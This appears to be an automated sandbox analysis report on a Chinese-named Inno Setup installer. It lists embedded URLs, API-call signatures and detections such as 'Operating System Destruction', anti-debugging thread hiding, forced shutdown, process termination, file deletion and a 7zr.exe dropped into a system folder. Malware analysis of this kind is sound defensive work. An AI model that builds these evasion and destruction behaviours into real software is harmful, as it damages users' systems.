Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.0000000003520000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007F8AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000000.2108242601.0000000000161000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.2132809367.00000000005AD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.2.drStatic PE information: section name: .=~
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CCC3886
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE45120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CE45120
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CCC3C62
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CE45D60
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CCC3D62
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CCC3D18
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CCC39CF
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CCC3A6A
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC1950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6CCC1950
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6CCC4754
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCC47546_2_6CCC4754
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCD4A276_2_6CCD4A27
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE418806_2_6CE41880
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE46A436_2_6CE46A43
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEA6CE06_2_6CEA6CE0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF14DE06_2_6CF14DE0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF6D106_2_6CEF6D10
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CECAEEF6_2_6CECAEEF
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFEEF06_2_6CEFEEF0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE92EC96_2_6CE92EC9
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE78EA16_2_6CE78EA1
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF0C8D06_2_6CF0C8D0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEC48966_2_6CEC4896
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF148706_2_6CF14870
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF068206_2_6CF06820
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEEE8106_2_6CEEE810
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF169996_2_6CF16999
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE789726_2_6CE78972
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF089506_2_6CF08950
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF0A9306_2_6CF0A930
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF69006_2_6CEF6900
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF04AA06_2_6CF04AA0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CED0A526_2_6CED0A52
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE80BCA6_2_6CE80BCA
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF0EBC06_2_6CF0EBC0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEEAB906_2_6CEEAB90
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE90B666_2_6CE90B66
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFE4D06_2_6CEFE4D0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CED84AC6_2_6CED84AC
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF044896_2_6CF04489
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF45D06_2_6CEF45D0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF25806_2_6CEF2580
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFC5806_2_6CEFC580
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEE25216_2_6CEE2521
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF085206_2_6CF08520
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF146C06_2_6CF146C0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF0E6006_2_6CF0E600
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEDC7F36_2_6CEDC7F3
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE7C7CF6_2_6CE7C7CF
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF167C06_2_6CF167C0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF067A06_2_6CF067A0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFE0E06_2_6CEFE0E0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF00206_2_6CEF0020
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF0C2A06_2_6CF0C2A0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF082006_2_6CF08200
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF15D906_2_6CF15D90
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEC7D436_2_6CEC7D43
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF3D506_2_6CEF3D50
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF9E806_2_6CEF9E80
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CED1F116_2_6CED1F11
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF078C86_2_6CF078C8
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEE589F6_2_6CEE589F
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF99F06_2_6CEF99F0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEEDAD06_2_6CEEDAD0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF1AA06_2_6CEF1AA0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEEFA506_2_6CEEFA50
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE9540A6_2_6CE9540A
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEBF5EC6_2_6CEBF5EC
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFF5C06_2_6CEFF5C0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF96E06_2_6CEF96E0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF0F6406_2_6CF0F640
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEEB6506_2_6CEEB650
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF137C06_2_6CF137C0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF197006_2_6CF19700
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE930926_2_6CE93092
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFF0506_2_6CEFF050
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEF71F06_2_6CEF71F0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFD2806_2_6CEFD280
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CEFD3806_2_6CEFD380
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF06AF06_2_6CF06AF0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF037506_2_6CF03750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004A81EC10_2_004A81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E81C010_2_004E81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F824010_2_004F8240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004D425010_2_004D4250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FC3C010_2_004FC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F04C810_2_004F04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004D865010_2_004D8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004B094310_2_004B0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DC95010_2_004DC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004D8C2010_2_004D8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F0E0010_2_004F0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F4EA010_2_004F4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004ED08910_2_004ED089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004C10AC10_2_004C10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F112010_2_004F1120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F91C010_2_004F91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DD1D010_2_004DD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E518010_2_004E5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FD2C010_2_004FD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004653CF10_2_004653CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004C53F310_2_004C53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FD47010_2_004FD470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F54D010_2_004F54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004AD49610_2_004AD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F155010_2_004F1550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0046157210_2_00461572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004B965210_2_004B9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004ED6A010_2_004ED6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0047976610_2_00479766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004697CA10_2_004697CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FD9E010_2_004FD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00461AA110_2_00461AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E5E8010_2_004E5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E5F8010_2_004E5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0047E00A10_2_0047E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E22E010_2_004E22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0050230010_2_00502300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004CE49F10_2_004CE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E25F010_2_004E25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004D66D010_2_004D66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DA6A010_2_004DA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FE99010_2_004FE990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E2A8010_2_004E2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004BAB1110_2_004BAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E6CE010_2_004E6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E70D010_2_004E70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004CB12110_2_004CB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DB18010_2_004DB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F720010_2_004F7200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FF3C010_2_004FF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0048B3E410_2_0048B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004EF3A010_2_004EF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004D741010_2_004D7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004EF42010_2_004EF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0050351A10_2_0050351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DF50010_2_004DF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F353010_2_004F3530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FF59910_2_004FF599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0050360110_2_00503601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004F77C010_2_004F77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004D379010_2_004D3790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0048F8E010_2_0048F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DF91010_2_004DF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0047BAC910_2_0047BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004B3AEF10_2_004B3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E7AF010_2_004E7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E7C5010_2_004E7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0047BC9210_2_0047BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004DFDF010_2_004DFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: String function: 6CF16F10 appears 720 times
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: String function: 6CE79240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00461E40 appears 152 times
